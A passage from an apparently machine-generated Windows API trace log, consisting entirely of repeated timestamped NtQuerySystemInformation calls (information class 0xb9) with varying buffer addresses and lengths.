SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0282.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0282.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c890, Length=0x20, ResultLength=0x0) [0282.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0282.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0282.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0282.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0282.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0282.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0282.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0282.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0282.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d270, Length=0x28, ResultLength=0x0) [0282.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0282.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0282.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x20, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x20, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0282.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0282.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0282.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfe0, Length=0x20, ResultLength=0x0) [0282.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfe0, Length=0x20, ResultLength=0x0) [0282.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x20, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x20, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x20, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x20, ResultLength=0x0) [0282.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d060, Length=0x20, ResultLength=0x0) [0282.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d060, Length=0x20, ResultLength=0x0) [0282.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0282.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0282.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0282.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0282.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0282.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf50, Length=0x48, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf50, Length=0x48, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0282.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0282.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0282.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0282.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0282.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0282.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0282.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0282.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0282.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0282.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0282.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0282.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0282.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0282.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0282.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0282.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 